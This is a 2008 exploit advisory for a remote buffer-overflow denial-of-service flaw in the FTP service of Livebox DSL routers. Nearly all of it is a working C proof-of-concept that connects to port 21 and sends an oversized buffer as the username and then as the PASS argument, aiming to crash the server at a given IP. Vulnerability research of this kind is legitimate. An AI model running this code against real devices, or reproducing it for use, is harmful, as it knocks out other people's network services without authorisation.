liveboxftp-overflow.txt
Posted on 04 March 2008
Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS Discovered by: 0in from DaRk-CodeRs Security & Programming Group! http://dark-coders.4rh.eu DESCRIPTION: Livebox (tested on polish "Neostrada TP Livebox") is vulnerability to remote (but from local network, because firewall working..) buffer overflow DoS attack to FTP service. FULL FTP SERVER NAME:"ADI Convergence Galaxy FTP server v0.1". POC: #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <unistd.h> #include <string.h> int port=21; struct hostent *he; struct sockaddr_in their_addr; int konekt(char *addr) { int sock; he=gethostbyname(addr); if(he==NULL) { printf("Unknow host! exiting..."); return -1; } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); return -2; } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(port); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '�', 8); if (connect(sock, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); return -1; } return sock; } int main(int argc,char *argv[]) { printf(" +===============================Yeah======================================+"); printf(" += ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); printf(" += Remote Buffer Overflow DoS Exploit =+"); printf(" += bY =+"); printf(" += Maks M. [0in] From Dark-CodeRs Security & Programming Group! =+"); printf(" += 0in(dot)email[at]gmail(dot)com =+"); printf(" += Please visit: http://dark-coders.4rh.eu =+"); printf(" += Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+"); printf(" += MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+"); printf(" += Chomzee, AfroPL, Joker186 =+"); printf(" +===============================Yeah======================================+"); if(argc<2) { printf(" Use %s [IP]! ",argv[0]); exit(0); } printf(" Connecting to:%s...",argv[1]); int sock=konekt(argv[1]); if(sock<0) { printf(" eh..."); exit(0); } printf(" Connected!! "); char rcv[256]; recv(sock,rcv,255,0); printf(" %s ",rcv); printf(" Sending evil buffer.."); char evil[100*100]="%nx01x02x03x04"; int i; for(i=0;i<(100*100)-100;i++) { strcat(evil,"A"); } strcat(evil," "); send(sock,evil,strlen(evil),0); strcpy(rcv,""); recv(sock,rcv,255,0); printf(" %s ",rcv); char pass[100*1000]="PASS "; strcat(pass,evil); strcat(pass," "); send(sock,pass,strlen(pass),0); strcpy(rcv,""); recv(sock,rcv,255,0); printf(" %s ",rcv); printf(" OK! You're Livebox FTP server should fu**ed out..."); exit(0); } EOF.
